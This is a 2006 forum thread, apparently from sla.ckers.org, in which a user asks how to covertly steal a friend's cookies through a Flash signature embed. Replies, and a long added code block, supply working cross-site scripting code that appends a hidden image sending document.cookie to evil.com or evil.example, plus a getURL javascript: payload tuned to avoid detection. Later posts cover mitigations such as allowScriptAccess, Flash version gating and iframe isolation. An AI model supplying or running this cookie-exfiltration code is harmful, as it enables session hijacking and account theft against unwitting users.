Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
XSS and flash
Posted by: kyo1
Date: September 17, 2006 05:10AM

Well, I am at a site that allows you to embed Flash in your signature. I managed to alert the cookies by using getURL; now I want to make a frame to transfer the cookies, but when I use document.write it overwrites the whole page, and innerHTML is not working either, it can't find the tags on the page...
This needs to work with Firefox, since that's the browser my friend is using; it doesn't need to work with Opera/IE.

I could of course use document.write anyway, since it fetches the cookies perfectly fine, but I don't want my friend to notice what I am doing...

What should I do?

Is there a way to fetch ALL the content of the site, so I can re-document.write it?

-kyo



Edited 2 time(s). Last edit at 09/17/2006 07:07AM by kyo1.

Re: XSS and flash
Posted by: maluc
Date: September 17, 2006 05:23AM

When you say you aren't able to use innerHTML... have you tried document.getElementById('anytagwithid').innerHTML?

Assuming in the source of the page there's some tag like <div id="adspam">blah</div>, you can append data (instead of overwriting) using
document.getElementById('adspam').innerHTML = document.getElementById('adspam').innerHTML + "<img src='http://evil.com/cookiestealer.jpg?" + document.cookie + "' style='visibility:hidden' />";

If the image still changes some of the spacing, throw in height='0' width='0'.

Image tags are nicer to use, when possible, instead of iframes, for those security-minded folks that disable iframes.

-maluc

Re: XSS and flash
Posted by: WhiteAcid
Date: September 17, 2006 05:26AM

By the way, it can be abbreviated using document.getElementById('adspam').innerHTML += "new stuff".
Or even just do
document.body.innerHTML += "new stuff"

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: XSS and flash
Posted by: kyo1
Date: September 17, 2006 06:40AM

Yes, I did try that; it does the same as document.write. When I do it with += I get the content of the div, my new code and nothing else than that...

Re: XSS and flash
Posted by: maluc
Date: September 17, 2006 06:58AM

Hrm, that is weird... then use the document.body as WhiteAcid suggested.

If not, window.frames[0].document.body.innerHTML += ... should work as well.

-maluc



Edited 1 time(s). Last edit at 09/17/2006 06:58AM by maluc.

Re: XSS and flash
Posted by: kyo1
Date: September 17, 2006 07:06AM

Those don't work with Firefox either...

Re: XSS and flash
Posted by: WhiteAcid
Date: September 17, 2006 09:34AM

I'd quite like to test these myself on the site.

Anyway... innerHTML is out of the question.
I don't know if Flash can do this, but what about the DOM approach, i.e.:
txt = document.createElement('input')
txt.type = 'text'
txt.value = 'something'
document.body.appendChild(txt)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: XSS and flash
Posted by: rsnake
Date: September 17, 2006 01:24PM

Yup, that last suggestion WhiteAcid made is what I would have suggested as well. You really just want to append it to the end of the page. You can also just change an existing image to another image (your cookie stealer) by iterating through the images on the page. That doesn't mean you have to break the image either; you can still show the correct image (301 to it, or output it with your cookie-stealer script).

- RSnake
Gotta love it. http://ha.ckers.org
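The appending approach the replies above converge on, written out as an added example that is not code from any post in this thread. It builds the beacon URL, appends a zero-size hidden image through the DOM rather than through innerHTML, and packages the same steps as the javascript: URL that an ActionScript 2 getURL() call would navigate to. One caveat worth knowing when this is driven from getURL: navigating to a javascript: URL whose final expression is not undefined replaces the document with that value's string form, and `el.innerHTML += x` evaluates to the new HTML string, which is one way to end up with "the content of the div, my new code and nothing else". The payload below therefore ends in `void 0`. The collector endpoint evil.example/collect and the stand-in document object are assumptions made for the example.

```javascript
// Added example, not from the thread.  Beacon built the way maluc, WhiteAcid
// and RSnake describe: append a hidden <img> to the page instead of rewriting
// it, with the cookie carried in the image URL.

// Hypothetical collector endpoint (assumption for this example).
const COLLECTOR = "http://evil.example/collect";

// Beacon URL carrying the cookie as a query parameter.  URL-encoding keeps
// ';', '=' and '&' inside the cookie string from breaking the query.
function buildBeaconUrl(collectorBase, cookie) {
  return collectorBase + "?c=" + encodeURIComponent(cookie);
}

// Append an invisible image to the document and return it.  `doc` is any
// object with the DOM shape used here (createElement, body.appendChild,
// cookie), so this runs against a real browser document or the stand-in
// below.  Nothing already on the page is re-parsed or replaced.
function appendBeacon(doc, collectorBase) {
  const img = doc.createElement("img");
  img.src = buildBeaconUrl(collectorBase, doc.cookie);
  // zero size and hidden: no layout change for the viewer to notice
  img.width = 0;
  img.height = 0;
  img.style.visibility = "hidden";
  doc.body.appendChild(img);
  return img;
}

// The same steps as a single javascript: URL, suitable for ActionScript 2's
//   getURL("javascript:...");
// The trailing `void 0` makes the whole expression evaluate to undefined, so
// the browser does not replace the document with the expression's result.
function buildGetUrlPayload(collectorBase) {
  return (
    "javascript:" +
    "var i=document.createElement('img');" +
    "i.src='" + collectorBase + "?c='+encodeURIComponent(document.cookie);" +
    "i.width=0;i.height=0;i.style.visibility='hidden';" +
    "document.body.appendChild(i);" +
    "void 0"
  );
}

// True when a javascript: payload ends in `void 0`, i.e. it will not
// navigate the page away.
function payloadIsVoid(payload) {
  return payload.startsWith("javascript:") && /void 0$/.test(payload);
}

// Constructed stand-in for the browser document so the example runs offline.
function makeFakeDocument(cookie) {
  const body = {
    children: [],
    appendChild(node) { this.children.push(node); return node; },
  };
  return {
    cookie,
    body,
    createElement(tag) { return { tagName: tag.toUpperCase(), style: {} }; },
  };
}

// Demo against the stand-in document with a constructed cookie value.
const demo = makeFakeDocument("PHPSESSID=abc123; theme=dark");
appendBeacon(demo, COLLECTOR);
console.log(demo.body.children[0].src);
console.log(buildGetUrlPayload(COLLECTOR));
```

In a browser the only change is `appendBeacon(document, COLLECTOR)`; the image request carries the cookie whether or not the collector returns a valid image, which is also why RSnake's note about serving the real image back (or 301-ing to it) costs the attacker nothing.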

Re: XSS and flash
Posted by: metal_hurlant
Date: September 29, 2006 01:29AM

For the other side of the coin (i.e., the crazy people that still think allowing users to embed arbitrary Flash content is a good idea (hi MySpace) :)

Setting allowScriptAccess="never" as a parameter on the <embed> tag was supposed to be enough to prevent embedded Flash movies from executing script in the page context.
Unfortunately, it didn't quite work out that way, so the only methods available to prevent arbitrary script execution are:
1. Disable Flash embedding altogether. But that's no fun.
2. Detect the Flash player version and react in one of the following manners:
a. If version >= 9.0, add allowNetworking="internal" and allow the movie to load; otherwise, prevent the movie from loading. This approach will break any attempt to use getURL, including legitimate "http://" uses.
b. If version > 8.0.24 or version >= 7.066, allow the movie to load; otherwise, prevent the movie from loading.

Re: XSS and flash
Posted by: rsnake
Date: September 29, 2006 10:18AM

What about the concept of putting it in an iframe on another domain? That way the JavaScript is limited to what it can do in the other domain (no cookies, nothing dynamic). So all you risk is redirection/CSRF/intranet port scanning (not like that's no risk, but it could mitigate it a little). Just a thought.

- RSnake
Gotta love it. http://ha.ckers.org
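The defender-side options from the two posts above (metal_hurlant's version-gated embed policy and RSnake's separate-origin iframe), as an added example that is not code from either post or from any site mentioned. Assumptions: the detected player version arrives as a dotted string such as "9.0.28.0"; "7.066" in the post is read as 7.0.66; the isolating origin is the hypothetical host user-content.example; and attribute values are escaped before being written into markup so a signature ID or SWF URL cannot break out of the tag.

```javascript
// Added example, not from the thread.  Two embed policies from the post plus
// the iframe isolation RSnake suggests.

// Parse "major.minor.build[.patch]" into [major, minor, build].
function parseVersion(v) {
  const parts = String(v).split(".").map(Number);
  if (parts.length === 0 || parts.some(Number.isNaN)) {
    throw new Error("unrecognised Flash version: " + v);
  }
  while (parts.length < 3) parts.push(0);
  return parts.slice(0, 3);
}

// strcmp-style comparison of two parsed versions.
function compareVersion(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// Option 2a: load only on a 9.0+ player and add allowNetworking="internal".
// Side effect from the post: every getURL breaks, legitimate http:// included.
function policyNetworkingInternal(version) {
  const v = parseVersion(version);
  if (compareVersion(v, [9, 0, 0]) >= 0) {
    return { allow: true, params: { allowScriptAccess: "never", allowNetworking: "internal" } };
  }
  return { allow: false, reason: "player below 9.0" };
}

// Option 2b: load only on players where allowScriptAccess="never" holds:
// anything above 8.0.24, or 7.0.66 and later on the 7.x line ("7.066" read
// as 7.0.66, an assumption).
function policyPatchedPlayersOnly(version) {
  const v = parseVersion(version);
  const ok =
    compareVersion(v, [8, 0, 24]) > 0 ||
    (v[0] === 7 && compareVersion(v, [7, 0, 66]) >= 0);
  return ok
    ? { allow: true, params: { allowScriptAccess: "never" } }
    : { allow: false, reason: "player version known to ignore allowScriptAccess" };
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Render the <embed> carrying the policy's parameters, or a blocked marker.
function renderEmbed(swfUrl, decision) {
  if (!decision.allow) {
    return "<!-- flash blocked: " + escapeAttr(decision.reason) + " -->";
  }
  const attrs = Object.entries(decision.params)
    .map(([k, v]) => " " + k + '="' + escapeAttr(v) + '"')
    .join("");
  return '<embed src="' + escapeAttr(swfUrl) + '" type="application/x-shockwave-flash"' + attrs + "></embed>";
}

// RSnake's isolation: the embed page lives on a separate origin, so script
// that does escape the movie runs with that origin's cookies and DOM, not
// the main site's.  Redirection, CSRF and intranet probing remain possible.
const USER_CONTENT_ORIGIN = "http://user-content.example"; // hypothetical host
function renderIsolatedFrame(signatureId) {
  const src = USER_CONTENT_ORIGIN + "/sig/" + encodeURIComponent(signatureId);
  return '<iframe src="' + escapeAttr(src) + '" width="468" height="60"></iframe>';
}

// Demo with constructed version strings.
for (const ver of ["9.0.28.0", "8.0.24.0", "7.0.66.0", "6.0.79.0"]) {
  console.log(ver, policyNetworkingInternal(ver).allow, policyPatchedPlayersOnly(ver).allow);
}
console.log(renderEmbed("http://example.test/sig.swf", policyNetworkingInternal("9.0.28.0")));
console.log(renderIsolatedFrame("kyo&1"));
```

Both policies depend on trusting the version string the client reports, so they are a mitigation for the known-broken players rather than a boundary; the separate-origin iframe is the only one of the three that still holds when the version check is wrong.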
